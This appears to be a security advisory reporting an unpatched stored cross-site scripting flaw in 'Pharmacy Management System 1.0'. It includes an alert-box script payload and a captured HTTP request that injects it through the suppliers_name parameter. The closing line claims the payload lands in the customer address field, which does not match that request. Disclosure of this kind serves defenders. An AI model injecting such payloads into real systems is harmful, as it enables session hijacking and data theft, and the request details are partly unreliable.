- Pharmacy Management System: 1.0
- Vulnerability Type: Stored Cross-Site Scripting (XSS)
- Severity: HIGH
- Status: Unpatched
/php/manage_customer.php?action=update&id=4&name=Kiran%20Suthar&contact_number=1234567690&address=Andheri%20East&doctor_name=Anshari&doctor_address=test
A stored XSS vulnerability has been identified in the Pharmacy Management System version 1.0, specifically within the customer update functionality. This flaw occurs because user input fields, such as the name
, address
, or doctor_address
parameters, are not properly sanitized. An attacker can inject malicious JavaScript code, which is stored in the database and executed each time the affected page is accessed.
The persistence of this XSS attack poses a high risk, as it can impact both administrators and users by enabling:
- Session hijacking
- Theft of sensitive information (e.g., login credentials)
- Privilege escalation
- Defacement or manipulation of web content
This vulnerability could allow attackers to perform more dangerous actions, such as stealing authentication cookies or altering critical data without detection.
Below is an example of a malicious payload injected into the address
field:
<script>alert('XSS');</script>
If this payload is stored, every time an administrator or user views the affected customer record, the script will execute, triggering the alert. A more sophisticated payload could redirect users to malicious sites or steal session cookies.
GET /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=%3Cscript%3Ealert(%22/XSS/%22);%3C/script%3E HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_medicine.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
Once this request is executed, the payload is saved in the customer address field and executed every time the customer record is accessed.